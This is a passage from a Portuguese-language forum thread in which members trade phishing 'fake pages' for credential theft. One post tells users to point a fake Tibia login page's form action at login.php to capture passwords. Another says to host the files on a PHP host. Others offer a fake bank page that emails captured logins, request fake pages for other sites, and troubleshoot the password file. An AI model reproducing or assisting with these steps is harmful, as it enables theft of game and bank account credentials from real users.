Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Paginas Fake 2012

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #16
    achei um fãn do redtube =P

    Comment


    • Font Size
      #17
      Alguem ai poderia disponibilizar alguma Imbox que funcione. tenho umas aqui mais só começa a enviar e para

      Comment


      • Font Size
        #18
        Amigo, meus parabéns, se puder criar um do Tibia, eu agradeço, ninguém mais está conseguindo. Aceita esse desafio ?

        Comment


        • Font Size
          #19
          valeu amigo
          A SUA INVEJA É MEU SUCESSO

          Comment


          • Font Size
            #20
            Postado Originalmente por galofagofigus Ver Post
            Amigo, meus parabéns, se puder criar um do Tibia, eu agradeço, ninguém mais está conseguindo. Aceita esse desafio ?
            Ja criei a pagina fake do Tibia so que tem que altera uma tag no arquivo index.htm que eu esqueci de altera
            Baixe a pagina Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...e Procure esta linha:
            Código HTML:
            <form action="https://secure.tibia.com/account/?subtopic=accountmanagement"
            e altere, assim:
            Código HTML:
            <form action="login.php"
            e pronto

            desculpa qualquer coisa,

            Comment


            • Font Size
              #21
              amigonao estoconseguindo achar um host para hospedar os arquivos poderia me sitar algo que eu possa cria cadastros em um monte nao consegui configura um.

              Comment


              • Font Size
                #22
                Parabens pelo post

                Comment


                • Font Size
                  #23
                  EU FIZ MEU PEDIDO LA PORFAVOR ARRUMA AE PRA MIM
                  Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... queria uma pagina fake dele,tipow se for bom tbm
                  tenta fazer pra eles loga pra da um disfarce maior se nao consegui td bem faz normal

                  Comment


                  • Font Size
                    #24
                    *-* Meu deus Muito obrigado

                    Comment


                    • Font Size
                      #25
                      teria como encianr o que fazer ? eu baixei a pagina fake do tibia, arrumei o que você mandou, mas não sei o que fazer agora, quais arquivos hoespedar e etc... teria como ajudar ?

                      Comment


                      • Font Size
                        #26
                        Por favor, não consigo postar na área pedidos, pode fazer uma page fake pra mim?
                        Preciso urgente de uma página fake desse site por favor!
                        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                        Comment


                        • Font Size
                          #27
                          Fake desco atualizada autenticando salva na vull e envia pro email

                          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                          Comment


                          • Font Size
                            #28
                            Postado Originalmente por afonsoz Ver Post
                            teria como encianr o que fazer ? eu baixei a pagina fake do tibia, arrumei o que você mandou, mas não sei o que fazer agora, quais arquivos hoespedar e etc... teria como ajudar ?
                            Hospede todos os arquivos em um Site de Hospedage, que aceite php
                            Procure algun host no google !

                            Comment


                            • Font Size
                              #29
                              Boa Nego Pra Onde vai as Senha?

                              Comment


                              • Font Size
                                #30
                                cara, nao ta criando o arquivo de senhas no server to usando o freewebhostingarea, fiz algo errado?

                                Comment

                                X
                                Working...
                                X